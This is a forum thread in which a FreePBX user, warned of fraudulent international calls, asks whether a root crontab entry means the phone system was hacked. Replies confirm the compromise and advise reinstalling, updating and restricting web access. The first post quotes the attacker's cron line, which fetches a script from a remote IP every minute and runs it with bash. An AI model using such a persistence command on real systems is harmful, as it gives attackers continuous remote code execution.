Crontab entry: has my PBX been hacked?

FreePBX Security
1

Hello all,
I received a warning from my telephone company today about possible unauthorized international calls from my PBX.
While looking into the installation I stumbled upon the following root crontab entry:

*/1 * * * * wget http://37.49.230.74/k.php -O /var/lib/asterisk/bin/devnull2;bash /var/lib/asterisk/bin/devnull2

The IP address has no reverse DNS and according to whois belongs to a company in the Netherlands. Also, the downloaded k.php looks quite fishy.

Asterisk 16.17.0

FreePBX installed from SNG7-PBX16-64bit-2105-7.iso

-Heinrich

1 Like
2

Yes, your system has been hacked. Don’t try to clean it up. Reinstall a clean .iso and restore from a backup taken before the attack. Most likely, the cause is

See also this discussion:

If your system had been updated to one of the vulnerable versions, it is almost certain that this is what happened.

To reduce the chance of similar incidents in the future, ensure that any kind of web access to the PBX (admin, UCP, REST, etc.) is restricted to whitelisted IP addresses.

3

Thank you very much. I will do a fresh install. Obviously, I must also consider my configured SIP passwords stolen and will need to change them.

-Heinrich

4

Just to make sure: Is SNG7-PBX16-64bit-2112-4.iso (downloaded yesterday) already patched against this exploit?

-Heinrich

5

Looking at the release notes it was released before the patches. Full ISO aren’t usually released that often. I would suggest running all updates anyway before restoring any backup or putting into production as part of any install.

6

Thanks for quick reply :slight_smile:
I did

  • yum update
  • fwconsole ma upgradeall

Anything else to update?

7

Remember to do a reload after updating.

8

This topic was automatically closed 30 days after the last reply. New replies are no longer allowed.